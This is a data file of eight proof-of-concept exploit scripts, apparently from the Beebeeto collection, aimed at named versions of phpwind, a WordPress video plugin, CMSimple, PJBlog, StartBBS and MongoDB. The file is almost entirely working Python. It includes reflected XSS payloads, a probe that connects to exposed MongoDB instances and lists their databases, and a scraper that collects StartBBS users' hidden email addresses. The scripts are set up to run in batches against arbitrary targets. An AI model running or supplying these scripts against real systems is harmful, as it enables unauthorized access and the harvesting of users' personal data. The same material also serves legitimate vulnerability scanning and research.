{"create_date": "2014-12-11 01:02:34", "name": "phpwind 9.0 \u8c9d\u5854 \u53cd\u5c04XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u6f0f\u6d1e,xss\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0200',\r\n 'name': 'phpwind 9.0 \u8c9d\u5854 \u53cd\u5c04XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['9.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['phpwind\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1aindex.php',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2012-012163',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/index.php?m=1%22%3E%3Cscript%3Ealert%28%22bb2%22%29%3C%2Fscript%3E%26c%3Dforum'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n content = urllib2.urlopen(req).read()\r\n except urllib2.URLError, e:\r\n content = e.read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aindex.php", "app_name": "PHPWind", "id": "poc-2014-0200", "layer4_protocol": null}
{"create_date": "2014-12-11 00:54:22", "name": "phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u6f0f\u6d1e,xss\u6f0f\u6d1e,flash xss,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0199',\r\n 'name': 'phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind', \r\n 'vul_version': ['9.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['phpwind\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', 'flash xss', 'php'],\r\n 'desc': 'http://packetstormsecurity.com/files/118059/SWF-Upload-Cross-Site-Scripting.html',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2013-017731',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n file_path = \"/res/js/dev/util_libs/swfupload/Flash/swfupload.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url + '?movieName=\"])}catch(e){alert(1)}//'\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://packetstormsecurity.com/files/118059/SWF-Upload-Cross-Site-Scripting.html", "app_name": "PHPWind", "id": "poc-2014-0199", "layer4_protocol": null}
{"create_date": "2014-12-10 13:35:45", "name": "WordPress DZS-VideoGallery /ajax.php XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "WordPress DZS-VideoGallerye,xss\u6f0f\u6d1e,/wp-content/plugins/dzs-videogallery/ajax.php, php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0195',\r\n 'name': 'WordPress DZS-VideoGallery /ajax.php XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress DZS-VideoGallery',\r\n 'vul_version': [''],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['WordPress DZS-VideoGallerye', 'xss\u6f0f\u6d1e', '/wp-content/plugins/dzs-videogallery/ajax.php', 'php'],\r\n 'desc': '''\r\n WordPress\u662fWordPress\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u7684\u4e00\u5957\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u8be5\u5e73\u53f0\u652f\u6301\u5728PHP\u548cMySQL\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u4e2a\u4eba\u535a\u5ba2\u7f51\u7ad9\u3002\r\n DZS-VideoGallery\u662f\u5176\u4e2d\u7684\u4e00\u4e2aDZS\u89c6\u9891\u5e93\u63d2\u4ef6\u3002 \r\n WordPress DZS-VideoGallery\u63d2\u4ef6\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684\u8f93\u5165\u3002\r\n \u5f53\u7528\u6237\u6d4f\u89c8\u88ab\u5f71\u54cd\u7684\u7f51\u7ad9\u65f6\uff0c\u5176\u6d4f\u89c8\u5668\u5c06\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u811a\u672c\u4ee3\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u653b\u51fb\u8005\u7a83\u53d6\u57fa\u4e8ecookie\u7684\u8eab\u4efd\u8ba4\u8bc1\u5e76\u53d1\u8d77\u5176\u5b83\u653b\u51fb\u3002\r\n ''',\r\n 'references': ['http://sebug.net/vuldb/ssvid-61532',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/wp-content/plugins/dzs-videogallery/ajax.php?ajax=true&height=400&\"\r\n \"width=610&type=vimeo&source=%22%2F%3E%3Cscript%3Ealert%28bb2%29%3C%2Fscript%3E\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "WordPress\u662fWordPress\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u7684\u4e00\u5957\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u8be5\u5e73\u53f0\u652f\u6301\u5728PHP\u548cMySQL\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u4e2a\u4eba\u535a\u5ba2\u7f51\u7ad9\u3002\r\nDZS-VideoGallery\u662f\u5176\u4e2d\u7684\u4e00\u4e2aDZS\u89c6\u9891\u5e93\u63d2\u4ef6\u3002 \r\nWordPress DZS-VideoGallery\u63d2\u4ef6\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684\u8f93\u5165\u3002\r\n\u5f53\u7528\u6237\u6d4f\u89c8\u88ab\u5f71\u54cd\u7684\u7f51\u7ad9\u65f6\uff0c\u5176\u6d4f\u89c8\u5668\u5c06\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u811a\u672c\u4ee3\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u653b\u51fb\u8005\u7a83\u53d6\u57fa\u4e8ecookie\u7684\u8eab\u4efd\u8ba4\u8bc1\u5e76\u53d1\u8d77\u5176\u5b83\u653b\u51fb\u3002", "app_name": "WordPress", "id": "poc-2014-0195", "layer4_protocol": null}
{"create_date": "2014-12-10 12:38:52", "name": "Mongodb \u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Mongodb\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,27017/28017\u7aef\u53e3", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport pymongo\r\nimport urllib2\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0194',\r\n 'name': 'Mongodb \u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-12-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [28017],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Mongodb',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Mongodb\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', '\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '27017/28017\u7aef\u53e3'],\r\n 'desc': 'mongodb\u542f\u52a8\u65f6\u672a\u52a0 --auth\u9009\u9879\uff0c\u5bfc\u81f4\u65e0\u9700\u8ba4\u8bc1\u5373\u53ef\u8fde\u63a5mongodb\u6570\u636e\u5e93\uff0c\u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n ip_addr = urlparse.urlparse(verify_url).netloc\r\n if args['options']['verbose']:\r\n print '[*] Connect mongodb: ' + ip_addr + ':27017'\r\n try:\r\n conn = pymongo.MongoClient(ip_addr, 27017, socketTimeoutMS=3000)\r\n dbname = conn.database_names()\r\n if dbname:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = ip_addr + ':27017'\r\n args['poc_ret']['database_names'] = dbname\r\n except Exception, e:\r\n if args['options']['verbose']:\r\n print str(e)\r\n args['success'] = False\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "mongodb\u542f\u52a8\u65f6\u672a\u52a0 --auth\u9009\u9879\uff0c\u5bfc\u81f4\u65e0\u9700\u8ba4\u8bc1\u5373\u53ef\u8fde\u63a5mongodb\u6570\u636e\u5e93\uff0c\u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002", "app_name": "MongoDB", "id": "poc-2014-0194", "layer4_protocol": null}
{"create_date": "2014-12-10 00:48:32", "name": "StartBBS v1.1.5 \u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "StartBBS\u4fe1\u606f\u6cc4\u9732,\u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0192',\r\n 'name': 'StartBBS v1.1.5 \u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-12-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'StartBBS',\r\n 'vul_version': ['1.1.5'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['StartBBS\u4fe1\u606f\u6cc4\u9732', '\u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n \u4ee3\u7801 /themes/default/userinfo.php\u5728\u7b2c86\u884c\u6709\u8fd9\u6837\u4e00\u53e5\uff1a\r\n <div class='inner'><p><?php echo $introduction?></p><!--<p>\r\n \u8054\u7cfb\u65b9\u5f0f: <a href=\"mailto:<?php echo $email?>\" class=\"external mail\">\r\n <?php echo $email?></a></p>--></div>\r\n\r\n \u8f93\u51fa\u4e86\u7528\u6237\u7684\u90ae\u7bb1\uff0c\u4f46\u662f\u7ed9\u6ce8\u91ca\u6389\u4e86\uff0c\u6240\u4ee5\u7528\u6237\u9875\u9762\u770b\u4e0d\u5230\u3002\u3002\u67e5\u770b\u6e90\u4ee3\u7801\u5373\u53ef\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-051696',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n # GET User\r\n url = args['options']['target']\r\n index_content = urllib2.urlopen(url).read()\r\n regex_user = re.compile(r'(/user/info/\\d+)\" class=\"dark startbbs profile_link\"', re.IGNORECASE)\r\n regex_mail = re.compile(r\"\\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,4}\\b\", re.IGNORECASE)\r\n user_list = regex_user.findall(index_content)\r\n # Main\r\n if user_list:\r\n user_url = []\r\n args['poc_ret']['user_email'] = []\r\n # GET User homepage\r\n for i in user_list[-3:]:\r\n url_tmp = url + i\r\n user_url.append(url_tmp)\r\n # GET Email\r\n for i in user_url:\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + i\r\n try:\r\n content = urllib2.urlopen(i).read()\r\n except:\r\n continue\r\n mail_list = regex_mail.findall(content)\r\n # Success or False\r\n if mail_list:\r\n for mail in mail_list:\r\n args['success'] = True\r\n args['options']['target'] = user_url\r\n args['poc_ret']['user_email'].append(mail)\r\n if not args['poc_ret']['user_email']:\r\n args['success'] = False\r\n args['poc_ret'].pop('user_email')\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u4ee3\u7801 /themes/default/userinfo.php\u5728\u7b2c86\u884c\u6709\u8fd9\u6837\u4e00\u53e5\uff1a\r\n <div class='inner'><p><?php echo $introduction?></p><!--<p>\r\n \u8054\u7cfb\u65b9\u5f0f: <a href=\"mailto:<?php echo $email?>\" class=\"external mail\">\r\n <?php echo $email?></a></p>--></div>\r\n\r\n\u8f93\u51fa\u4e86\u7528\u6237\u7684\u90ae\u7bb1\uff0c\u4f46\u662f\u7ed9\u6ce8\u91ca\u6389\u4e86\uff0c\u6240\u4ee5\u7528\u6237\u9875\u9762\u770b\u4e0d\u5230\u3002\u3002\u67e5\u770b\u6e90\u4ee3\u7801\u5373\u53ef", "app_name": "Startbbs", "id": "poc-2014-0192", "layer4_protocol": null}
{"create_date": "2014-12-09 23:53:01", "name": "StartBBS v1.1.3 \u7269\u7406\u8def\u5f84\u6cc4\u6f0f POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 1, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "StartBBS\u4fe1\u606f\u6cc4\u9732,StartBBS\u7206\u8def\u5f84,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0191',\r\n 'name': 'StartBBS v1.1.3 \u7269\u7406\u8def\u5f84\u6cc4\u6f0f POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'StartBBS',\r\n 'vul_version': ['1.1.3'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['StartBBS\u4fe1\u606f\u6cc4\u9732', 'StartBBS\u7206\u8def\u5f84', 'php'],\r\n 'desc': 'http://startbbs/index.php/home/getmore/w.jsp \u968f\u610f\u6784\u9020\u4e00\u4e2a.jsp\u7206\u51fa\u6570\u636e\u5e93\u67e5\u8be2\u8bed\u53e5',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2013-045780',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/index.php/home/getmore/w.jsp'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'Filename:' in content and 'You have an error in your SQL syntax' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://startbbs/index.php/home/getmore/w.jsp \u968f\u610f\u6784\u9020\u4e00\u4e2a.jsp\u7206\u51fa\u6570\u636e\u5e93\u67e5\u8be2\u8bed\u53e5", "app_name": "Startbbs", "id": "poc-2014-0191", "layer4_protocol": null}
{"create_date": "2014-12-09 23:25:29", "name": "CMSimple 3.54 /whizzywig/wb.php XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "CMSimple\u6f0f\u6d1e,xss\u6f0f\u6d1e,/whizzywig/wb.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0190',\r\n 'name': 'CMSimple 3.54 /whizzywig/wb.php XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'CMSimple',\r\n 'vul_version': ['3.54'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['CMSimple\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/whizzywig/wb.php', 'php'],\r\n 'desc': '''\r\n \u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.CMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9\"/whizzywig/wb.php\"\u811a\u672c\u7684\"d\" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\r\n \u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002\r\n ''',\r\n 'references': ['http://sebug.net/vuldb/ssvid-61903',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27bb2%27%29%3C/script%3E'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.CMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9\"/whizzywig/wb.php\"\u811a\u672c\u7684\"d\" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\r\n\u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002", "app_name": "CMSimple", "id": "poc-2014-0190", "layer4_protocol": null}
{"create_date": "2014-12-09 23:04:31", "name": "PJBlog 3.0.6.170 /Action.asp XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "PJBlog\u6f0f\u6d1e,xss\u6f0f\u6d1e,/Action.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0188',\r\n 'name': 'PJBlog 3.0.6.170 /Action.asp XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PJBlog',\r\n 'vul_version': ['3.0.6.170'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['PJBlog\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/Action.asp', 'asp'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1aAction.asp',\r\n 'references': ['http://sebug.net/vuldb/ssvid-11236',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/Action.asp?action=type1&mainurl=xxx\">%3Cscript%3Ealert%28%22bb2%22%29%3C%2Fscript%3E'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aAction.asp", "app_name": "PJblog", "id": "poc-2014-0188", "layer4_protocol": null}
